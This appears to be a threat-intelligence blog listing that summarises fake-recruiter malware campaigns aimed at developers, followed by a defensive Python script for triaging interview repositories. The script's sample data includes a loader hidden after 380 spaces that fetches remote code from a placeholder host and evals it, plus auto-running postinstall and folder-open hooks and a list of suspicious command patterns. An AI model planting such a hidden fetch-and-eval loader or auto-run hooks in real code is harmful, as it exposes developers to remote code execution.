Wallet Trap: BeaverTail and Trojanized MetaMask via Fake Developer Assignment

“The rite began with promise and ended in defilement.” Executive Summary A threat actor operating a fake recruiter persona on LinkedIn targeted developers with a bogus technical assignment. The lure repository (mocorex) was hosted on Bitbucket under the fabricated organisation fortegroup-org, using a plausible corporate naming pattern rather than a verified legitimate company identity. The project presented as a standard React/Vite web application, complete with plausible component structure and a commit history spanning multiple apparent contributors. Concealed within it was a horizontally indented loader, public/vite.cookie.js, designed to evade casual code review by pushing the staging call off-screen in a normal editor viewport. In the preserved sample, the staging call appears on line 529 after 380 leading horizontal whitespace characters. ...

March 24, 2026 · ThreatProphet

BetPoker: Credential-Gated JavaScript RAT with Dual Delivery Routes in a Web3 Assessment Repository

“The table is set like an altar, and whoso sits there is counted among the damned.” Executive Summary A threat actor operating under the GitHub organisation LimitBreakOrgs used a repository named bet_ver_1, publicly described as “BetPoker”, as a malicious Web3 gaming assessment project. The organisation name appears designed to resemble limitbreakinc, the legitimate GitHub organisation associated with Limit Break Inc., a Web3 gaming company. The preserved repository presents as a Web3 poker and sports betting platform and contains two independent execution routes: one through a VS Code folder-open task, and one through backend startup via npm start. ...

March 2, 2026 · ThreatProphet

Lumanagi: Downloader Concealed in Tailwind Config, Delivered via Fake DeFi Interview

“The blueprints were genuine. The building was not.” Executive Summary A threat actor operating a fake recruiter persona on LinkedIn approached the researcher with a Technical Manager role at a fabricated DeFi company, offering $25,000 USD per month and directing the target to a Calendly booking page operated under the handle devs_empire. The actor shared a Bitbucket repository - lmng2026 - as the basis of a technical interview, presenting a polished, fully-designed DeFi platform called Lumanagi to establish credibility. The repository contained two independent execution paths: a VS Code folder-open task and a build-chain payload hidden in tailwind.config.js. The first path requires only opening the repository in a trusted VS Code workspace where automatic tasks are allowed; the second executes during normal frontend start or build activity. Neither requires the target to explicitly run the concealed payload file. ...

March 1, 2026 · ThreatProphet

Japanese-Royal: Environment Harvesting and JavaScript RAT Delivered via Fake Developer Interview

“He came as a messenger with gifts, and the birds grew fat.” Executive Summary A threat actor operating a fake recruiter persona on LinkedIn approached developers with a CTO-level opportunity at a fabricated Japanese e-commerce company. After establishing credibility through a polished project brief, the actor shared a GitHub repository named Japanese-Royal as part of a technical interview, directing the target to review and run the codebase. The repository contained a multi-stage implant reachable through several routine developer actions, including VS Code folder-open tasks, npm lifecycle hooks, normal startup scripts, and direct server execution. ...

February 25, 2026 · ThreatProphet

Interview Trap: Blockchain-Staged JavaScript RAT Delivered via LinkedIn

“The snare is laid in secret; the prey walks toward it of his own will.” Executive Summary A threat actor, operating a fake recruiter persona on LinkedIn, targeted developers by asking them to complete a “technical assessment” that required cloning and running a malicious GitHub repository named Tech-Core. The repository contained a multi-stage malware implant designed to execute through two paths: VS Code workspace task abuse and npm script execution. ...

February 24, 2026 · ThreatProphet
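The five posts above share three repository-level indicators: code pushed past the right edge of the editor with hundreds of leading whitespace characters (the vite.cookie.js loader), a `.vscode/tasks.json` task with `runOptions.runOn` set to `folderOpen`, and package.json lifecycle or start scripts that execute something other than the framework command. The triage script below is an added example, not ThreatProphet's tooling or anything recovered from the lure repositories; it runs offline over a constructed in-memory repository. The 120-column threshold, the tab width, the list of lifecycle hooks, the suspicious-command regex and every path, label and command in the sample data are assumptions chosen for illustration.

```python
"""Triage a cloned assessment repository for the lure indicators described above.
Added example (not the posts' own code). Thresholds and patterns are assumptions."""
import json
import re
from typing import Dict, List, Tuple

INDENT_THRESHOLD = 120  # assumed viewport width; the preserved vite.cookie.js used 380 spaces
TAB_WIDTH = 4           # assumed rendering width for a tab character
JS_EXT = (".js", ".mjs", ".cjs", ".jsx", ".ts", ".tsx")
# npm scripts that run without the developer naming the payload file (assumed list).
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish",
                   "prestart", "start", "poststart", "predev", "dev", "prebuild", "build"}
# Commands that should never appear unexplained in an interview project's scripts (assumed list).
SUSPICIOUS_CMD = re.compile(r"node\s+-e\b|curl\b|wget\b|powershell|Invoke-|child_process|"
                            r"eval\(|base64|\bsh\s+-c\b", re.IGNORECASE)


def find_offscreen_code(source: str, min_indent: int = INDENT_THRESHOLD) -> List[Tuple[int, str]]:
    """Return (line_no, visible_code) for lines whose first token sits past min_indent columns."""
    hits = []
    for no, line in enumerate(source.splitlines(), start=1):
        stripped = line.lstrip(" \t")
        if not stripped:               # blank or whitespace-only lines are not concealment
            continue
        lead = line[: len(line) - len(stripped)]
        columns = len(lead) + (TAB_WIDTH - 1) * lead.count("\t")
        if columns >= min_indent:
            hits.append((no, stripped.rstrip()))
    return hits


def _strip_jsonc_comments(text: str) -> str:
    """tasks.json is JSONC; drop full-line // comments so json.loads accepts it (simplified)."""
    return re.sub(r"^\s*//.*$", "", text, flags=re.MULTILINE)


def find_folder_open_tasks(tasks_json: str) -> List[Tuple[str, str]]:
    """Return (label, command) for tasks VS Code would start when the folder is opened."""
    doc = json.loads(_strip_jsonc_comments(tasks_json))
    found = []
    for task in doc.get("tasks", []):
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            found.append((task.get("label", "<unlabelled>"), task.get("command") or task.get("script") or ""))
    return found


def find_suspicious_scripts(package_json: str) -> List[Tuple[str, str, str]]:
    """Return (script_name, command, reason) for package.json scripts worth reading before running."""
    found = []
    for name, cmd in json.loads(package_json).get("scripts", {}).items():
        if SUSPICIOUS_CMD.search(cmd):
            found.append((name, cmd, "suspicious command"))
        elif name in LIFECYCLE_HOOKS and name.startswith(("pre", "post")):
            found.append((name, cmd, "runs automatically around another script"))
        elif name in LIFECYCLE_HOOKS and re.search(r"&&|\|\||;", cmd):
            found.append((name, cmd, "chained commands in lifecycle script"))
    return found


def triage_repo(files: Dict[str, str]) -> List[str]:
    """Apply all three checks to a {path: content} mapping and return sorted finding strings."""
    findings = []
    for path, content in files.items():
        if path.endswith(".vscode/tasks.json"):
            for label, cmd in find_folder_open_tasks(content):
                findings.append(f"{path}: task '{label}' runs on folder open: {cmd}")
        elif path.rsplit("/", 1)[-1] == "package.json":
            for name, cmd, why in find_suspicious_scripts(content):
                findings.append(f"{path}: script '{name}' ({why}): {cmd}")
        elif path.endswith(JS_EXT):
            for no, code in find_offscreen_code(content):
                findings.append(f"{path}:{no}: code hidden past column {INDENT_THRESHOLD}: {code}")
    return sorted(findings)


# Constructed sample repository (not the mocorex, bet_ver_1, lmng2026 or Tech-Core contents).
SAMPLE_VITE_COOKIE_JS = (
    "// constructed sample: looks like a cookie helper\n"
    "export function getCookie(name) {\n"
    "  return document.cookie.split('; ').find(r => r.startsWith(name + '='));\n"
    "}\n"
    + " " * 380 + "fetch('https://example.invalid/s').then(r => r.text()).then(eval);\n"
)
SAMPLE_TASKS_JSON = """{
  // constructed: the task runs when the trusted folder is opened
  "version": "2.0.0",
  "tasks": [
    { "label": "Prepare workspace", "type": "shell", "command": "node .vscode/setup.js",
      "runOptions": { "runOn": "folderOpen" } },
    { "label": "Build", "type": "npm", "script": "build" }
  ]
}"""
SAMPLE_PACKAGE_JSON = r"""{
  "name": "constructed-lure",
  "scripts": {
    "dev": "vite",
    "build": "vite build",
    "start": "node public/vite.cookie.js && vite",
    "postinstall": "node -e \"require('child_process').execSync('node server/init.js')\""
  }
}"""
SAMPLE_REPO = {
    "public/vite.cookie.js": SAMPLE_VITE_COOKIE_JS,
    "src/App.jsx": "export default function App() {\n  return <div>hi</div>;\n}\n",
    ".vscode/tasks.json": SAMPLE_TASKS_JSON,
    "package.json": SAMPLE_PACKAGE_JSON,
}

if __name__ == "__main__":
    for finding in triage_repo(SAMPLE_REPO):
        print(finding)
```

The indentation check only catches concealment by leading whitespace; a loader appended after hundreds of trailing spaces on an otherwise normal line, or folded into a minified one-liner, needs a separate check on line length. The tasks.json check is the reason the posts stress workspace trust: a `folderOpen` task is harmless on a machine where automatic tasks are disabled, so pair this scan with a look at the `task.allowAutomaticTasks` setting before opening any interview repository in VS Code.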